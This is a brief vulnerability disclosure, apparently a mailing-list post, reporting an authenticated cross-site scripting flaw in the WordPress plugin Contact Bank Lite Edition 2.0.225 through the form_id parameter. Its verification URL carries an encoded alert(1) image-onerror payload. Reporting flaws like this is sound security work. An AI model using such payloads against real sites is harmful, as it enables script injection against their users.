Subject: Cross-Site Scripting (XSS) in Contact Bank Lite Edition 2.0.225

Date: Thu, 13 Aug 2015 15:28:50 +0200

Hello,

Plugin: Contact Bank Lite Edition 2.0.225 https://wordpress.org/plugins/contact-bank/

1. Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject html/js code.

Method: GET

Url: http://localhost/wp-admin/admin.php?page=form_preview&form_id=[xss]

Vulnerable parameter: form_id

Example PHP callstack:

/contact-bank/views/contact_bank_form_preview.php:286

Verification:

http://localhost/wp-admin/admin.php?page=form_preview&form_id=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,